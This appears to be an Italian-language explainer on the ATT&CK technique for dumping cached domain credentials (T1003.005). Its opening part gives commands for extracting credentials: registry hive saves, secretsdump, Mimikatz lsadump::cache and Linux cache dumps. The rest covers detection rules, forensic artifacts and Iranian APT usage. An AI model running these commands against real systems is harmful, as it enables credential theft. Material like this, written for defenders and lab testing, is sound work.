Cached Domain Credentials: OS Credential Dumping - Cached Domain Credentials (T1003.005)

Il dumping delle credenziali cached richiede privilegi elevati su tutti i sistemi operativi. Su Windows, con accesso SYSTEM, puoi utilizzare diversi approcci operativi.

reg save HKLM\SECURITY security.hiv reg save HKLM\SYSTEM system.hiv

Questi comandi esportano i registry hive necessari per l'estrazione offline. Successivamente, puoi processarli con secretsdump.py di Impacket:

secretsdump.py -security security.hiv -system system.hiv LOCAL

Per un approccio più diretto, Mimikatz offre il modulo dedicato:

privilege::debug token::elevate lsadump::cache

Su Linux, l'estrazione richiede prima l'identificazione del database corretto. Per sistemi con SSSD:

sudo tdbdump /var/lib/sss/db/cache.DOMAIN.COM.ldb | grep -i cached

Quest VAS richiede un approccio diverso. Prima identifica il database, poi estrai:

sudo strings /var/opt/quest/vas/authcache/vas_auth.vdb | grep -i '$DCC2$'

Linikatz automatizza il processo su Linux, richiedendo solo:

sudo ./linikatz.sh

Per testare in laboratorio, configura prima un ambiente con credenziali cached. Su Windows, autentica un utente di dominio poi disconnetti la rete. Le credenziali rimarranno nella cache per il numero di logon configurato nel registro.

Il numero di credenziali cached è controllabile via registro in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\cachedlogonscount. Il valore predefinito è 10 su workstation e 25 su server.

La detection di questa tecnica richiede il monitoraggio di pattern comportamentali specifici piuttosto che singoli eventi. Su Windows, configura la correlazione tra accesso ai registry hive e esecuzione di tool sospetti.

Nel tuo SIEM, implementa la logica di detection DET0513 che correla eventi Sysmon con Security log. Monitora EventCode 4656 (accesso oggetti) per i file SECURITY e SYSTEM hive, correlati temporalmente con processi che eseguono reg.exe o powershell.exe.

Per ridurre i falsi positivi, filtra gli accessi legittimi del backup software. Molte soluzioni enterprise accedono regolarmente ai registry hive. Crea una baseline dei processi autorizzati e allerta solo su deviazioni.

Su Linux, configura auditd per monitorare syscall di tipo open() e read() sui percorsi delle cache:

-w /var/lib/sss/db/ -p r -k credential_cache_access -w /var/opt/quest/vas/authcache/ -p r -k vas_cache_access

L'analisi AN1418 suggerisce di correlare questi accessi con elevazione privilegi recente. Un pattern tipico mostra sudo/su seguito da accesso ai file cache entro 5 minuti.

Implementa alerting differenziato per severity. Accessi sporadici da account amministrativi noti possono essere low priority. Accessi da processi non firmati o account di servizio dovrebbero triggerare alert immediati.

Per Sysmon, configura il logging dettagliato dei comandi. La detection AN1417 identifica pattern come "reg save HKLM\SECURITY" o l'uso di secretsdump.py attraverso l'analisi delle command line.

L'analisi forense del credential dumping richiede la ricostruzione precisa della sequenza di eventi. Su Windows, inizia verificando il valore di cachedlogonscount nel registro per capire quante credenziali erano potenzialmente disponibili.

Esamina il Security Event Log cercando EventID 4688 (process creation) per identificare quando sono stati eseguiti tool di dumping. Correlalo con EventID 4663 per tracciare l'accesso ai file di registro.

Gli artefatti chiave includono le Prefetch entries per mimikatz.exe, reg.exe con parametri specifici, o secretsdump.py. La presenza di MIMIKATZ.EXE-*.pf o pattern simili conferma l'esecuzione del tool.

Verifica la presenza di file temporanei lasciati dagli attaccanti. Spesso vengono create copie dei registry hive con nomi come security.hiv, system.hiv, o varianti. Controlla le cartelle temporanee e le directory di staging comuni.

Su Linux, analizza i log di auditd per tracciare l'accesso ai database delle credenziali. La sequenza tipica mostra elevazione privilegi seguita da accesso file:

type=SYSCALL msg=audit(XXX): arch=x86_64 syscall=open success=yes exit=3 a0=XXX a1=0 a2=0 a3=0 items=1 ppid=XXX pid=XXX

Cerca evidenze di tdbdump nei log di sistema. Il tool lascia tracce caratteristiche quando processa i database TDB. Verifica anche la bash history per comandi correlati, anche se gli attaccanti sofisticati la puliscono.

La timeline reconstruction deve includere quando le credenziali sono state cached originariamente. Su Windows, cerca EventID 4776 che indica autenticazione di credenziali di dominio, utile per determinare quali account erano nella cache al momento del dumping.

OilRig (G0049) dimostra particolare affinità per questa tecnica, integrandola sistematicamente nelle loro operazioni. Il gruppo utilizza LaZagne come parte di un toolkit più ampio che include credential dumping da Outlook Web Access, suggerendo un focus su ambienti enterprise Microsoft.

APT33 (G0064) condivide strumenti e TTP con OilRig, utilizzando anch'esso LaZagne ma con pattern operativi distinti. La loro implementazione spesso precede movimenti laterali verso sistemi critici di infrastruttura, particolarmente nel settore energetico.

MuddyWater (G0069) ha evoluto l'uso di questa tecnica nel tempo. Le loro campagne recenti mostrano LaZagne integrato in payload PowerShell offuscati, distribuiti attraverso documenti maldoc. Il gruppo tende a esfiltrare immediatamente le credenziali cached per uso in attacchi secondari.

Leafminer (G0077) rappresenta l'approccio più sofisticato, combinando multipli tool di credential harvesting. La loro metodologia include l'uso di LaZagne seguito da tool custom per processare gli hash DCC2, suggerendo capacità di password cracking dedicate.

L'overlap nell'uso di LaZagne tra questi gruppi indica possibili condivisioni di risorse o fornitori comuni di tool nel mercato underground iraniano. Tutti e quattro i gruppi mostrano collegamenti con interessi geopolitici mediorientali.

I pattern geografici rivelano che questi APT targetizzano principalmente organizzazioni con presenza in Medio Oriente ma credenziali cached di utenti occidentali. Questo suggerisce strategie di lungo termine per accesso persistente attraverso account dormienti.

Framework MITRE ATT&CK T1003.005 documenta questa tecnica con dettagli su 4 gruppi APT attivi. Le detection DET0513, AN1417 e AN1418 forniscono logiche di rilevamento per Windows e Linux. Riferimenti alle campagne di OilRig, APT33, MuddyWater e Leafminer disponibili nei report di threat intelligence dei principali vendor.